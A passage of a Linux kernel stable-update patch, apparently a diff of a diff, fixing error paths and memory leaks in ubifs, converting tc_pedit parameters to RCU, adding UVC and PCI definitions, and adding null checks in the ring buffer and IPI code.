+ 		if (page->index >= synced_i_size >> PAGE_SHIFT) {
+ 			err = inode->i_sb->s_op->write_inode(inode, NULL);
+ 			if (err)
+-				goto out_unlock;
++				goto out_redirty;
+ 			/*
+ 			 * The inode has been written, but the write-buffer has
+ 			 * not been synchronized, so in case of an unclean
+@@ -1060,11 +1060,17 @@ static int ubifs_writepage(struct page *page, struct writeback_control *wbc)
+ 	if (i_size > synced_i_size) {
+ 		err = inode->i_sb->s_op->write_inode(inode, NULL);
+ 		if (err)
+-			goto out_unlock;
++			goto out_redirty;
+ 	}
+ 
+ 	return do_writepage(page, len);
+-
++out_redirty:
++	/*
++	 * redirty_page_for_writepage() won't call ubifs_dirty_inode() because
++	 * it passes I_DIRTY_PAGES flag while calling __mark_inode_dirty(), so
++	 * there is no need to do space budget for dirty inode.
++	 */
++	redirty_page_for_writepage(wbc, page);
+ out_unlock:
+ 	unlock_page(page);
+ 	return err;
+@@ -1466,14 +1472,23 @@ static bool ubifs_release_folio(struct folio *folio, gfp_t unused_gfp_flags)
+ 	struct inode *inode = folio->mapping->host;
+ 	struct ubifs_info *c = inode->i_sb->s_fs_info;
+ 
+-	/*
+-	 * An attempt to release a dirty page without budgeting for it - should
+-	 * not happen.
+-	 */
+ 	if (folio_test_writeback(folio))
+ 		return false;
++
++	/*
++	 * Page is private but not dirty, weird? There is one condition
++	 * making it happened. ubifs_writepage skipped the page because
++	 * page index beyonds isize (for example. truncated by other
++	 * process named A), then the page is invalidated by fadvise64
++	 * syscall before being truncated by process A.
++	 */
+ 	ubifs_assert(c, folio_test_private(folio));
+-	ubifs_assert(c, 0);
++	if (folio_test_checked(folio))
++		release_new_page_budget(c);
++	else
++		release_existing_page_budget(c);
++
++	atomic_long_dec(&c->dirty_pg_cnt);
+ 	folio_detach_private(folio);
+ 	folio_clear_checked(folio);
+ 	return true;
+diff --git a/fs/ubifs/super.c b/fs/ubifs/super.c
+index d0c9a09988bc7..32cb147597960 100644
+--- a/fs/ubifs/super.c
++++ b/fs/ubifs/super.c
+@@ -833,7 +833,7 @@ static int alloc_wbufs(struct ubifs_info *c)
+ 		INIT_LIST_HEAD(&c->jheads[i].buds_list);
+ 		err = ubifs_wbuf_init(c, &c->jheads[i].wbuf);
+ 		if (err)
+-			return err;
++			goto out_wbuf;
+ 
+ 		c->jheads[i].wbuf.sync_callback = &bud_wbuf_callback;
+ 		c->jheads[i].wbuf.jhead = i;
+@@ -841,7 +841,7 @@ static int alloc_wbufs(struct ubifs_info *c)
+ 		c->jheads[i].log_hash = ubifs_hash_get_desc(c);
+ 		if (IS_ERR(c->jheads[i].log_hash)) {
+ 			err = PTR_ERR(c->jheads[i].log_hash);
+-			goto out;
++			goto out_log_hash;
+ 		}
+ 	}
+ 
+@@ -854,9 +854,18 @@ static int alloc_wbufs(struct ubifs_info *c)
+ 
+ 	return 0;
+ 
+-out:
+-	while (i--)
++out_log_hash:
++	kfree(c->jheads[i].wbuf.buf);
++	kfree(c->jheads[i].wbuf.inodes);
++
++out_wbuf:
++	while (i--) {
++		kfree(c->jheads[i].wbuf.buf);
++		kfree(c->jheads[i].wbuf.inodes);
+ 		kfree(c->jheads[i].log_hash);
++	}
++	kfree(c->jheads);
++	c->jheads = NULL;
+ 
+ 	return err;
+ }
+diff --git a/fs/ubifs/sysfs.c b/fs/ubifs/sysfs.c
+index 06ad8fa1fcfb0..54270ad36321e 100644
+--- a/fs/ubifs/sysfs.c
++++ b/fs/ubifs/sysfs.c
+@@ -144,6 +144,8 @@ int __init ubifs_sysfs_init(void)
+ 	kobject_set_name(&ubifs_kset.kobj, "ubifs");
+ 	ubifs_kset.kobj.parent = fs_kobj;
+ 	ret = kset_register(&ubifs_kset);
++	if (ret)
++		kset_put(&ubifs_kset);
+ 
+ 	return ret;
+ }
+diff --git a/fs/ubifs/tnc.c b/fs/ubifs/tnc.c
+index 488f3da7a6c6c..2469f72eeaabb 100644
+--- a/fs/ubifs/tnc.c
++++ b/fs/ubifs/tnc.c
+@@ -267,11 +267,18 @@ static struct ubifs_znode *dirty_cow_znode(struct ubifs_info *c,
+ 	if (zbr->len) {
+ 		err = insert_old_idx(c, zbr->lnum, zbr->offs);
+ 		if (unlikely(err))
+-			return ERR_PTR(err);
++			/*
++			 * Obsolete znodes will be freed by tnc_destroy_cnext()
++			 * or free_obsolete_znodes(), copied up znodes should
++			 * be added back to tnc and freed by
++			 * ubifs_destroy_tnc_subtree().
++			 */
++			goto out;
+ 		err = add_idx_dirt(c, zbr->lnum, zbr->len);
+ 	} else
+ 		err = 0;
+ 
++out:
+ 	zbr->znode = zn;
+ 	zbr->lnum = 0;
+ 	zbr->offs = 0;
+@@ -3053,6 +3060,21 @@ static void tnc_destroy_cnext(struct ubifs_info *c)
+ 		cnext = cnext->cnext;
+ 		if (ubifs_zn_obsolete(znode))
+ 			kfree(znode);
++		else if (!ubifs_zn_cow(znode)) {
++			/*
++			 * Don't forget to update clean znode count after
++			 * committing failed, because ubifs will check this
++			 * count while closing tnc. Non-obsolete znode could
++			 * be re-dirtied during committing process, so dirty
++			 * flag is untrustable. The flag 'COW_ZNODE' is set
++			 * for each dirty znode before committing, and it is
++			 * cleared as long as the znode become clean, so we
++			 * can statistic clean znode count according to this
++			 * flag.
++			 */
++			atomic_long_inc(&c->clean_zn_cnt);
++			atomic_long_inc(&ubifs_clean_zn_cnt);
++		}
+ 	} while (cnext && cnext != c->cnext);
+ }
+ 
+diff --git a/fs/ubifs/ubifs.h b/fs/ubifs/ubifs.h
+index 478bbbb5382f8..2f1f315810949 100644
+--- a/fs/ubifs/ubifs.h
++++ b/fs/ubifs/ubifs.h
+@@ -1623,8 +1623,13 @@ static inline int ubifs_check_hmac(const struct ubifs_info *c,
+ 	return crypto_memneq(expected, got, c->hmac_desc_len);
+ }
+ 
++#ifdef CONFIG_UBIFS_FS_AUTHENTICATION
+ void ubifs_bad_hash(const struct ubifs_info *c, const void *node,
+ 		    const u8 *hash, int lnum, int offs);
++#else
++static inline void ubifs_bad_hash(const struct ubifs_info *c, const void *node,
++				  const u8 *hash, int lnum, int offs) {};
++#endif
+ 
+ int __ubifs_node_check_hash(const struct ubifs_info *c, const void *buf,
+ 			  const u8 *expected);
+diff --git a/include/acpi/acpi_bus.h b/include/acpi/acpi_bus.h
+index e44be31115a67..0584e9f6e3397 100644
+--- a/include/acpi/acpi_bus.h
++++ b/include/acpi/acpi_bus.h
+@@ -534,6 +534,7 @@ int acpi_bus_update_power(acpi_handle handle, int *state_p);
+ int acpi_device_update_power(struct acpi_device *device, int *state_p);
+ bool acpi_bus_power_manageable(acpi_handle handle);
+ void acpi_dev_power_up_children_with_adr(struct acpi_device *adev);
++u8 acpi_dev_power_state_for_wake(struct acpi_device *adev);
+ int acpi_device_power_add_dependent(struct acpi_device *adev,
+ 				    struct device *dev);
+ void acpi_device_power_remove_dependent(struct acpi_device *adev,
+diff --git a/include/drm/display/drm_dp_mst_helper.h b/include/drm/display/drm_dp_mst_helper.h
+index 41fd8352ab656..32c764fb9cb56 100644
+--- a/include/drm/display/drm_dp_mst_helper.h
++++ b/include/drm/display/drm_dp_mst_helper.h
+@@ -841,7 +841,8 @@ int drm_dp_add_payload_part2(struct drm_dp_mst_topology_mgr *mgr,
+ 			     struct drm_dp_mst_atomic_payload *payload);
+ void drm_dp_remove_payload(struct drm_dp_mst_topology_mgr *mgr,
+ 			   struct drm_dp_mst_topology_state *mst_state,
+-			   struct drm_dp_mst_atomic_payload *payload);
++			   const struct drm_dp_mst_atomic_payload *old_payload,
++			   struct drm_dp_mst_atomic_payload *new_payload);
+ 
+ int drm_dp_check_act_status(struct drm_dp_mst_topology_mgr *mgr);
+ 
+@@ -867,6 +868,9 @@ struct drm_dp_mst_topology_state *
+ drm_atomic_get_mst_topology_state(struct drm_atomic_state *state,
+ 				  struct drm_dp_mst_topology_mgr *mgr);
+ struct drm_dp_mst_topology_state *
++drm_atomic_get_old_mst_topology_state(struct drm_atomic_state *state,
++				      struct drm_dp_mst_topology_mgr *mgr);
++struct drm_dp_mst_topology_state *
+ drm_atomic_get_new_mst_topology_state(struct drm_atomic_state *state,
+ 				      struct drm_dp_mst_topology_mgr *mgr);
+ struct drm_dp_mst_atomic_payload *
+diff --git a/include/linux/bootconfig.h b/include/linux/bootconfig.h
+index 1611f9db878e7..ca73940e26df8 100644
+--- a/include/linux/bootconfig.h
++++ b/include/linux/bootconfig.h
+@@ -59,7 +59,7 @@ struct xbc_node {
+ /* Maximum size of boot config is 32KB - 1 */
+ #define XBC_DATA_MAX	(XBC_VALUE - 1)
+ 
+-#define XBC_NODE_MAX	1024
++#define XBC_NODE_MAX	8192
+ #define XBC_KEYLEN_MAX	256
+ #define XBC_DEPTH_MAX	16
+ 
+diff --git a/include/linux/iommu.h b/include/linux/iommu.h
+index 46e1347bfa228..7695d9e14277f 100644
+--- a/include/linux/iommu.h
++++ b/include/linux/iommu.h
+@@ -401,6 +401,7 @@ struct iommu_fault_param {
+  * @iommu_dev:	 IOMMU device this device is linked to
+  * @priv:	 IOMMU Driver private data
+  * @max_pasids:  number of PASIDs this device can consume
++ * @attach_deferred: the dma domain attachment is deferred
+  *
+  * TODO: migrate other per device data pointers under iommu_dev_data, e.g.
+  *	struct iommu_group	*iommu_group;
+@@ -413,6 +414,7 @@ struct dev_iommu {
+ 	struct iommu_device		*iommu_dev;
+ 	void				*priv;
+ 	u32				max_pasids;
++	u32				attach_deferred:1;
+ };
+ 
+ int iommu_device_register(struct iommu_device *iommu,
+diff --git a/include/linux/mdio/mdio-mscc-miim.h b/include/linux/mdio/mdio-mscc-miim.h
+index 5b4ed2c3cbb9a..1ce699740af63 100644
+--- a/include/linux/mdio/mdio-mscc-miim.h
++++ b/include/linux/mdio/mdio-mscc-miim.h
+@@ -14,6 +14,6 @@
+ 
+ int mscc_miim_setup(struct device *device, struct mii_bus **bus,
+ 		    const char *name, struct regmap *mii_regmap,
+-		    int status_offset);
++		    int status_offset, bool ignore_read_errors);
+ 
+ #endif
+diff --git a/include/linux/netfilter.h b/include/linux/netfilter.h
+index d8817d381c14b..bef8db9d6c085 100644
+--- a/include/linux/netfilter.h
++++ b/include/linux/netfilter.h
+@@ -488,4 +488,9 @@ extern const struct nfnl_ct_hook __rcu *nfnl_ct_hook;
+  */
+ DECLARE_PER_CPU(bool, nf_skb_duplicated);
+ 
++/**
++ * Contains bitmask of ctnetlink event subscribers, if any.
++ * Can't be pernet due to NETLINK_LISTEN_ALL_NSID setsockopt flag.
++ */
++extern u8 nf_ctnetlink_has_listener;
+ #endif /*__LINUX_NETFILTER_H*/
+diff --git a/include/linux/pci.h b/include/linux/pci.h
+index 254c8a4126a89..50042ea8e0083 100644
+--- a/include/linux/pci.h
++++ b/include/linux/pci.h
+@@ -572,6 +572,7 @@ struct pci_host_bridge {
+ 	void		*release_data;
+ 	unsigned int	ignore_reset_delay:1;	/* For entire hierarchy */
+ 	unsigned int	no_ext_tags:1;		/* No Extended Tags */
++	unsigned int	no_inc_mrrs:1;		/* No Increase MRRS */
+ 	unsigned int	native_aer:1;		/* OS may use PCIe AER */
+ 	unsigned int	native_pcie_hotplug:1;	/* OS may use PCIe hotplug */
+ 	unsigned int	native_shpc_hotplug:1;	/* OS may use SHPC hotplug */
+diff --git a/include/linux/pci_ids.h b/include/linux/pci_ids.h
+index b362d90eb9b0b..bc8f484cdcf3b 100644
+--- a/include/linux/pci_ids.h
++++ b/include/linux/pci_ids.h
+@@ -3012,6 +3012,8 @@
+ #define PCI_DEVICE_ID_INTEL_VMD_9A0B	0x9a0b
+ #define PCI_DEVICE_ID_INTEL_S21152BB	0xb152
+ 
++#define PCI_VENDOR_ID_WANGXUN		0x8088
++
+ #define PCI_VENDOR_ID_SCALEMP		0x8686
+ #define PCI_DEVICE_ID_SCALEMP_VSMP_CTL	0x1010
+ 
+diff --git a/include/media/v4l2-uvc.h b/include/media/v4l2-uvc.h
+index f83e31661333b..b010a36fc1d95 100644
+--- a/include/media/v4l2-uvc.h
++++ b/include/media/v4l2-uvc.h
+@@ -99,6 +99,9 @@
+ #define UVC_GUID_FORMAT_BGR3 \
+ 	{ 0x7d, 0xeb, 0x36, 0xe4, 0x4f, 0x52, 0xce, 0x11, \
+ 	 0x9f, 0x53, 0x00, 0x20, 0xaf, 0x0b, 0xa7, 0x70}
++#define UVC_GUID_FORMAT_BGR4 \
++	{ 0x7e, 0xeb, 0x36, 0xe4, 0x4f, 0x52, 0xce, 0x11, \
++	 0x9f, 0x53, 0x00, 0x20, 0xaf, 0x0b, 0xa7, 0x70}
+ #define UVC_GUID_FORMAT_M420 \
+ 	{ 'M',  '4',  '2',  '0', 0x00, 0x00, 0x10, 0x00, \
+ 	 0x80, 0x00, 0x00, 0xaa, 0x00, 0x38, 0x9b, 0x71}
+@@ -266,6 +269,11 @@ static struct uvc_format_desc uvc_fmts[] = {
+ 		.guid		= UVC_GUID_FORMAT_BGR3,
+ 		.fcc		= V4L2_PIX_FMT_BGR24,
+ 	},
++	{
++		.name		= "BGRA/X 8:8:8:8 (BGR4)",
++		.guid		= UVC_GUID_FORMAT_BGR4,
++		.fcc		= V4L2_PIX_FMT_XBGR32,
++	},
+ 	{
+ 		.name		= "H.264",
+ 		.guid		= UVC_GUID_FORMAT_H264,
+diff --git a/include/memory/renesas-rpc-if.h b/include/memory/renesas-rpc-if.h
+index 862eff613dc79..2dcb82df0d176 100644
+--- a/include/memory/renesas-rpc-if.h
++++ b/include/memory/renesas-rpc-if.h
+@@ -65,24 +65,8 @@ enum rpcif_type {
+ 
+ struct rpcif {
+ 	struct device *dev;
+-	void __iomem *base;
+ 	void __iomem *dirmap;
+-	struct regmap *regmap;
+-	struct reset_control *rstc;
+ 	size_t size;
+-	enum rpcif_type type;
+-	enum rpcif_data_dir dir;
+-	u8 bus_size;
+-	u8 xfer_size;
+-	void *buffer;
+-	u32 xferlen;
+-	u32 smcr;
+-	u32 smadr;
+-	u32 command;		/* DRCMR or SMCMR */
+-	u32 option;		/* DROPR or SMOPR */
+-	u32 enable;		/* DRENR or SMENR */
+-	u32 dummy;		/* DRDMCR or SMDMCR */
+-	u32 ddr;		/* DRDRENR or SMDRENR */
+ };
+ 
+ int rpcif_sw_init(struct rpcif *rpc, struct device *dev);
+diff --git a/include/net/netns/conntrack.h b/include/net/netns/conntrack.h
+index e1290c159184a..1f463b3957c78 100644
+--- a/include/net/netns/conntrack.h
++++ b/include/net/netns/conntrack.h
+@@ -95,7 +95,6 @@ struct nf_ip_net {
+ 
+ struct netns_ct {
+ #ifdef CONFIG_NF_CONNTRACK_EVENTS
+-	u8 ctnetlink_has_listener;
+ 	bool ecache_dwork_pending;
+ #endif
+ 	u8			sysctl_log_invalid; /* Log invalid packets */
+diff --git a/include/net/sctp/structs.h b/include/net/sctp/structs.h
+index afa3781e3ca21..e1f6e7fc2b11e 100644
+--- a/include/net/sctp/structs.h
++++ b/include/net/sctp/structs.h
+@@ -1412,6 +1412,7 @@ struct sctp_stream_priorities {
+ 	/* The next stream in line */
+ 	struct sctp_stream_out_ext *next;
+ 	__u16 prio;
++	__u16 users;
+ };
+ 
+ struct sctp_stream_out_ext {
+diff --git a/include/net/tc_act/tc_pedit.h b/include/net/tc_act/tc_pedit.h
+index 3e02709a1df65..83fe399317818 100644
+--- a/include/net/tc_act/tc_pedit.h
++++ b/include/net/tc_act/tc_pedit.h
+@@ -4,22 +4,29 @@
+ 
+ #include <net/act_api.h>
+ #include <linux/tc_act/tc_pedit.h>
++#include <linux/types.h>
+ 
+ struct tcf_pedit_key_ex {
+ 	enum pedit_header_type htype;
+ 	enum pedit_cmd cmd;
+ };
+ 
+-struct tcf_pedit {
+-	struct tc_action	common;
+-	unsigned char		tcfp_nkeys;
+-	unsigned char		tcfp_flags;
+-	u32			tcfp_off_max_hint;
++struct tcf_pedit_parms {
+ 	struct tc_pedit_key	*tcfp_keys;
+ 	struct tcf_pedit_key_ex	*tcfp_keys_ex;
++	u32 tcfp_off_max_hint;
++	unsigned char tcfp_nkeys;
++	unsigned char tcfp_flags;
++	struct rcu_head rcu;
++};
++
++struct tcf_pedit {
++	struct tc_action common;
++	struct tcf_pedit_parms __rcu *parms;
+ };
+ 
+ #define to_pedit(a) ((struct tcf_pedit *)a)
++#define to_pedit_parms(a) (rcu_dereference(to_pedit(a)->parms))
+ 
+ static inline bool is_tcf_pedit(const struct tc_action *a)
+ {
+@@ -32,37 +39,81 @@ static inline bool is_tcf_pedit(const struct tc_action *a)
+ 
+ static inline int tcf_pedit_nkeys(const struct tc_action *a)
+ {
+-	return to_pedit(a)->tcfp_nkeys;
++	struct tcf_pedit_parms *parms;
++	int nkeys;
++
++	rcu_read_lock();
++	parms = to_pedit_parms(a);
++	nkeys = parms->tcfp_nkeys;
++	rcu_read_unlock();
++
++	return nkeys;
+ }
+ 
+ static inline u32 tcf_pedit_htype(const struct tc_action *a, int index)
+ {
+-	if (to_pedit(a)->tcfp_keys_ex)
+-		return to_pedit(a)->tcfp_keys_ex[index].htype;
++	u32 htype = TCA_PEDIT_KEY_EX_HDR_TYPE_NETWORK;
++	struct tcf_pedit_parms *parms;
++
++	rcu_read_lock();
++	parms = to_pedit_parms(a);
++	if (parms->tcfp_keys_ex)
++		htype = parms->tcfp_keys_ex[index].htype;
++	rcu_read_unlock();
+ 
+-	return TCA_PEDIT_KEY_EX_HDR_TYPE_NETWORK;
++	return htype;
+ }
+ 
+ static inline u32 tcf_pedit_cmd(const struct tc_action *a, int index)
+ {
+-	if (to_pedit(a)->tcfp_keys_ex)
+-		return to_pedit(a)->tcfp_keys_ex[index].cmd;
++	struct tcf_pedit_parms *parms;
++	u32 cmd = __PEDIT_CMD_MAX;
+ 
+-	return __PEDIT_CMD_MAX;
++	rcu_read_lock();
++	parms = to_pedit_parms(a);
++	if (parms->tcfp_keys_ex)
++		cmd = parms->tcfp_keys_ex[index].cmd;
++	rcu_read_unlock();
++
++	return cmd;
+ }
+ 
+ static inline u32 tcf_pedit_mask(const struct tc_action *a, int index)
+ {
+-	return to_pedit(a)->tcfp_keys[index].mask;
++	struct tcf_pedit_parms *parms;
++	u32 mask;
++
++	rcu_read_lock();
++	parms = to_pedit_parms(a);
++	mask = parms->tcfp_keys[index].mask;
++	rcu_read_unlock();
++
++	return mask;
+ }
+ 
+ static inline u32 tcf_pedit_val(const struct tc_action *a, int index)
+ {
+-	return to_pedit(a)->tcfp_keys[index].val;
++	struct tcf_pedit_parms *parms;
++	u32 val;
++
++	rcu_read_lock();
++	parms = to_pedit_parms(a);
++	val = parms->tcfp_keys[index].val;
++	rcu_read_unlock();
++
++	return val;
+ }
+ 
+ static inline u32 tcf_pedit_offset(const struct tc_action *a, int index)
+ {
+-	return to_pedit(a)->tcfp_keys[index].off;
++	struct tcf_pedit_parms *parms;
++	u32 off;
++
++	rcu_read_lock();
++	parms = to_pedit_parms(a);
++	off = parms->tcfp_keys[index].off;
++	rcu_read_unlock();
++
++	return off;
+ }
+ #endif /* __NET_TC_PED_H */
+diff --git a/include/net/tc_wrapper.h b/include/net/tc_wrapper.h
+index d323fffb839aa..8ba241760d0af 100644
+--- a/include/net/tc_wrapper.h
++++ b/include/net/tc_wrapper.h
+@@ -154,7 +154,6 @@ TC_INDIRECT_FILTER_DECLARE(mall_classify);
+ TC_INDIRECT_FILTER_DECLARE(route4_classify);
+ TC_INDIRECT_FILTER_DECLARE(rsvp_classify);
+ TC_INDIRECT_FILTER_DECLARE(rsvp6_classify);
+-TC_INDIRECT_FILTER_DECLARE(tcindex_classify);
+ TC_INDIRECT_FILTER_DECLARE(u32_classify);
+ 
+ static inline int tc_classify(struct sk_buff *skb, const struct tcf_proto *tp,
+@@ -207,10 +206,6 @@ static inline int tc_classify(struct sk_buff *skb, const struct tcf_proto *tp,
+ 	if (tp->classify == rsvp6_classify)
+ 		return rsvp6_classify(skb, tp, res);
+ #endif
+-#if IS_BUILTIN(CONFIG_NET_CLS_TCINDEX)
+-	if (tp->classify == tcindex_classify)
+-		return tcindex_classify(skb, tp, res);
+-#endif
+ 
+ skip:
+ 	return tp->classify(skb, tp, res);
+diff --git a/include/trace/events/f2fs.h b/include/trace/events/f2fs.h
+index 31d994e6b4ca9..35ecb3118c7d5 100644
+--- a/include/trace/events/f2fs.h
++++ b/include/trace/events/f2fs.h
+@@ -1293,6 +1293,43 @@ DEFINE_EVENT(f2fs__page, f2fs_vm_page_mkwrite,
+ 	TP_ARGS(page, type)
+ );
+ 
++TRACE_EVENT(f2fs_replace_atomic_write_block,
++
++	TP_PROTO(struct inode *inode, struct inode *cow_inode, pgoff_t index,
++			block_t old_addr, block_t new_addr, bool recovery),
++
++	TP_ARGS(inode, cow_inode, index, old_addr, new_addr, recovery),
++
++	TP_STRUCT__entry(
++		__field(dev_t,	dev)
++		__field(ino_t,	ino)
++		__field(ino_t,	cow_ino)
++		__field(pgoff_t, index)
++		__field(block_t, old_addr)
++		__field(block_t, new_addr)
++		__field(bool, recovery)
++	),
++
++	TP_fast_assign(
++		__entry->dev		= inode->i_sb->s_dev;
++		__entry->ino		= inode->i_ino;
++		__entry->cow_ino	= cow_inode->i_ino;
++		__entry->index		= index;
++		__entry->old_addr	= old_addr;
++		__entry->new_addr	= new_addr;
++		__entry->recovery	= recovery;
++	),
++
++	TP_printk("dev = (%d,%d), ino = %lu, cow_ino = %lu, index = %lu, "
++			"old_addr = 0x%llx, new_addr = 0x%llx, recovery = %d",
++		show_dev_ino(__entry),
++		__entry->cow_ino,
++		(unsigned long)__entry->index,
++		(unsigned long long)__entry->old_addr,
++		(unsigned long long)__entry->new_addr,
++		__entry->recovery)
++);
++
+ TRACE_EVENT(f2fs_filemap_fault,
+ 
+ 	TP_PROTO(struct inode *inode, pgoff_t index, unsigned long ret),
+diff --git a/include/uapi/linux/usb/video.h b/include/uapi/linux/usb/video.h
+index 6e8e572c2980a..2ff0e8a3a683d 100644
+--- a/include/uapi/linux/usb/video.h
++++ b/include/uapi/linux/usb/video.h
+@@ -179,6 +179,36 @@
+ #define UVC_CONTROL_CAP_AUTOUPDATE			(1 << 3)
+ #define UVC_CONTROL_CAP_ASYNCHRONOUS			(1 << 4)
+ 
++/* 3.9.2.6 Color Matching Descriptor Values */
++enum uvc_color_primaries_values {
++	UVC_COLOR_PRIMARIES_UNSPECIFIED,
++	UVC_COLOR_PRIMARIES_BT_709_SRGB,
++	UVC_COLOR_PRIMARIES_BT_470_2_M,
++	UVC_COLOR_PRIMARIES_BT_470_2_B_G,
++	UVC_COLOR_PRIMARIES_SMPTE_170M,
++	UVC_COLOR_PRIMARIES_SMPTE_240M,
++};
++
++enum uvc_transfer_characteristics_values {
++	UVC_TRANSFER_CHARACTERISTICS_UNSPECIFIED,
++	UVC_TRANSFER_CHARACTERISTICS_BT_709,
++	UVC_TRANSFER_CHARACTERISTICS_BT_470_2_M,
++	UVC_TRANSFER_CHARACTERISTICS_BT_470_2_B_G,
++	UVC_TRANSFER_CHARACTERISTICS_SMPTE_170M,
++	UVC_TRANSFER_CHARACTERISTICS_SMPTE_240M,
++	UVC_TRANSFER_CHARACTERISTICS_LINEAR,
++	UVC_TRANSFER_CHARACTERISTICS_SRGB,
++};
++
++enum uvc_matrix_coefficients {
++	UVC_MATRIX_COEFFICIENTS_UNSPECIFIED,
++	UVC_MATRIX_COEFFICIENTS_BT_709,
++	UVC_MATRIX_COEFFICIENTS_FCC,
++	UVC_MATRIX_COEFFICIENTS_BT_470_2_B_G,
++	UVC_MATRIX_COEFFICIENTS_SMPTE_170M,
++	UVC_MATRIX_COEFFICIENTS_SMPTE_240M,
++};
++
+ /* ------------------------------------------------------------------------
+  * UVC structures
+  */
+diff --git a/include/uapi/linux/uvcvideo.h b/include/uapi/linux/uvcvideo.h
+index 8288137387c0d..a9d0a64007ba5 100644
+--- a/include/uapi/linux/uvcvideo.h
++++ b/include/uapi/linux/uvcvideo.h
+@@ -86,7 +86,7 @@ struct uvc_xu_control_query {
+  * struct. The first two fields are added by the driver, they can be used for
+  * clock synchronisation. The rest is an exact copy of a UVC payload header.
+  * Only complete objects with complete buffers are included. Therefore it's
+- * always sizeof(meta->ts) + sizeof(meta->sof) + meta->length bytes large.
++ * always sizeof(meta->ns) + sizeof(meta->sof) + meta->length bytes large.
+  */
+ struct uvc_meta_buf {
+ 	__u64 ns;
+diff --git a/io_uring/kbuf.c b/io_uring/kbuf.c
+index 4a6401080c1f8..3002dc8271959 100644
+--- a/io_uring/kbuf.c
++++ b/io_uring/kbuf.c
+@@ -505,7 +505,7 @@ int io_register_pbuf_ring(struct io_ring_ctx *ctx, void __user *arg)
+ 	}
+ 
+ 	pages = io_pin_pages(reg.ring_addr,
+-			     struct_size(br, bufs, reg.ring_entries),
++			     flex_array_size(br, bufs, reg.ring_entries),
+ 			     &nr_pages);
+ 	if (IS_ERR(pages)) {
+ 		kfree(free_bl);
+diff --git a/kernel/dma/swiotlb.c b/kernel/dma/swiotlb.c
+index a34c38bbe28f1..ef3bc3a5bbed3 100644
+--- a/kernel/dma/swiotlb.c
++++ b/kernel/dma/swiotlb.c
+@@ -300,7 +300,8 @@ static void swiotlb_init_io_tlb_mem(struct io_tlb_mem *mem, phys_addr_t start,
+ 	return;
+ }
+ 
+-static void *swiotlb_memblock_alloc(unsigned long nslabs, unsigned int flags,
++static void __init *swiotlb_memblock_alloc(unsigned long nslabs,
++		unsigned int flags,
+ 		int (*remap)(void *tlb, unsigned long nslabs))
+ {
+ 	size_t bytes = PAGE_ALIGN(nslabs << IO_TLB_SHIFT);
+diff --git a/kernel/fail_function.c b/kernel/fail_function.c
+index a7ccd2930c5f4..d971a01893197 100644
+--- a/kernel/fail_function.c
++++ b/kernel/fail_function.c
+@@ -163,10 +163,7 @@ static void fei_debugfs_add_attr(struct fei_attr *attr)
+ 
+ static void fei_debugfs_remove_attr(struct fei_attr *attr)
+ {
+-	struct dentry *dir;
+-
+-	dir = debugfs_lookup(attr->kp.symbol_name, fei_debugfs_dir);
+-	debugfs_remove_recursive(dir);
++	debugfs_lookup_and_remove(attr->kp.symbol_name, fei_debugfs_dir);
+ }
+ 
+ static int fei_kprobe_handler(struct kprobe *kp, struct pt_regs *regs)
+diff --git a/kernel/irq/ipi.c b/kernel/irq/ipi.c
+index bbd945bacef08..961d4af76af37 100644
+--- a/kernel/irq/ipi.c
++++ b/kernel/irq/ipi.c
+@@ -188,9 +188,9 @@ EXPORT_SYMBOL_GPL(ipi_get_hwirq);
+ static int ipi_send_verify(struct irq_chip *chip, struct irq_data *data,
+ 			   const struct cpumask *dest, unsigned int cpu)
+ {
+-	const struct cpumask *ipimask = irq_data_get_affinity_mask(data);
++	const struct cpumask *ipimask;
+ 
+-	if (!chip || !ipimask)
++	if (!chip || !data)
+ 		return -EINVAL;
+ 
+ 	if (!chip->ipi_send_single && !chip->ipi_send_mask)
+@@ -199,6 +199,10 @@ static int ipi_send_verify(struct irq_chip *chip, struct irq_data *data,
+ 	if (cpu >= nr_cpu_ids)
+ 		return -EINVAL;
+ 
++	ipimask = irq_data_get_affinity_mask(data);
++	if (!ipimask)
++		return -EINVAL;
++
+ 	if (dest) {
+ 		if (!cpumask_subset(dest, ipimask))
+ 			return -EINVAL;
+diff --git a/kernel/printk/index.c b/kernel/printk/index.c
+index c85be186a7832..a6b27526baaf6 100644
+--- a/kernel/printk/index.c
++++ b/kernel/printk/index.c
+@@ -145,7 +145,7 @@ static void pi_create_file(struct module *mod)
+ #ifdef CONFIG_MODULES
+ static void pi_remove_file(struct module *mod)
+ {
+-	debugfs_remove(debugfs_lookup(pi_get_module_name(mod), dfs_index));
++	debugfs_lookup_and_remove(pi_get_module_name(mod), dfs_index);
+ }
+ 
+ static int pi_module_notify(struct notifier_block *nb, unsigned long op,
+diff --git a/kernel/trace/ring_buffer.c b/kernel/trace/ring_buffer.c
+index b641cab2745e9..20cd8c9d245e2 100644
+--- a/kernel/trace/ring_buffer.c
++++ b/kernel/trace/ring_buffer.c
+@@ -5604,11 +5604,16 @@ EXPORT_SYMBOL_GPL(ring_buffer_alloc_read_page);
+  */
+ void ring_buffer_free_read_page(struct trace_buffer *buffer, int cpu, void *data)
+ {
+-	struct ring_buffer_per_cpu *cpu_buffer = buffer->buffers[cpu];
++	struct ring_buffer_per_cpu *cpu_buffer;
+ 	struct buffer_data_page *bpage = data;
+ 	struct page *page = virt_to_page(bpage);
+ 	unsigned long flags;
+ 
++	if (!buffer || !buffer->buffers || !buffer->buffers[cpu])
++		return;
++
++	cpu_buffer = buffer->buffers[cpu];
++
+ 	/* If the page is still in use someplace else, we can't reuse it */
+ 	if (page_ref_count(page) > 1)
+ 		goto out;
+diff --git a/net/9p/trans_rdma.c b/net/9p/trans_rdma.c
+index 83f9100d46bff..b84748baf9cbe 100644
+--- a/net/9p/trans_rdma.c
++++ b/net/9p/trans_rdma.c
+@@ -385,6 +385,7 @@ post_recv(struct p9_client *client, struct p9_rdma_context *c)
+ 	struct p9_trans_rdma *rdma = client->trans;
+ 	struct ib_recv_wr wr;
+ 	struct ib_sge sge;
++	int ret;
+ 
+ 	c->busa = ib_dma_map_single(rdma->cm_id->device,
+ 				    c->rc.sdata, client->msize,
+@@ -402,7 +403,12 @@ post_recv(struct p9_client *client, struct p9_rdma_context *c)
+ 	wr.wr_cqe = &c->cqe;
+ 	wr.sg_list = &sge;
+ 	wr.num_sge = 1;
+-	return ib_post_recv(rdma->qp, &wr, NULL);
++
++	ret = ib_post_recv(rdma->qp, &wr, NULL);
++	if (ret)
++		ib_dma_unmap_single(rdma->cm_id->device, c->busa,
++				    client->msize, DMA_FROM_DEVICE);
++	return ret;
+ 
+  error:
+ 	p9_debug(P9_DEBUG_ERROR, "EIO\n");
